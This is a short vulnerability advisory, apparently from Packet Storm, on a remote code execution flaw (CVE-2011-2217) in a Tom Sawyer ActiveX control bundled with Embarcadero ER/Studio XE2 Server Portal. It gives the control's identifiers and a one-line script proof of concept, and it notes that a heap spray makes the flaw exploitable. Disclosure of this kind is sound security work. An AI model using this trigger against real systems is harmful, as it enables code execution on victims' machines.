Embarcadero ER/Studio XE2 Server Portal Tom Sawyer's default GET extension active-x control suffers from a remote code execution vulnerability.
a3dc3fcf45b92326f26568939ecf5eef117cc6fff591f24725b29fca5935e142
See: CVE-2011-2217
reference url: https://www.securityfocus.com/bid/48099
The mentioned product is vulnerable to the same issue.
download url: https://downloads.embarcadero.com/free/er_studio_portal
ActiveX settings:
ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1
CLSID: {658ED6E7-0DA1-4ADD-B2FB-095F08091118}
Binary path: D:\Program Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll
Safe for scripting (registry): true
Safe for initialize (registry): true
poc:
<script>
var obj = new ActiveXObject("TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1");
</script>
then the dll will try to call inside an unitialized memory region
which is reachable by an attacker through heap spray.
//rgod
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed